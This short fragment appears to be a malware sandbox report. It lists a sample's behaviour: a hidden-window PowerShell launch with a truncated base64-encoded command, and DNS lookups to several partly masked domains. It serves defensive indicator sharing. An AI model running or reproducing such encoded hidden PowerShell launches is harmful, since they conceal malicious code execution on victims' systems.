Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABVAHUAZgByAG8AaQBvAHUAZwA9ACcAQQBqAGwAbAB3AHAAbABiAGsAJwA7ACQAWQBrAG0AYgBvAHoAYwB6ACAAPQAgACcANgA0AD...
- DNS ASK ma#####monkeymedia.com
- DNS ASK ar##ika.id
- DNS ASK as###dum.com.au
- DNS ASK cl#####ltisaude.com.br
- DNS ASK cl###energy.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABVAHUAZgByAG8AaQBvAHUAZwA9ACcAQQBqAGwAbAB3AHAAbABiAGsAJwA7ACQAWQBrAG0AYgBvAHoAYwB6ACAAPQAgACcANgA0AD...' (with hidden window)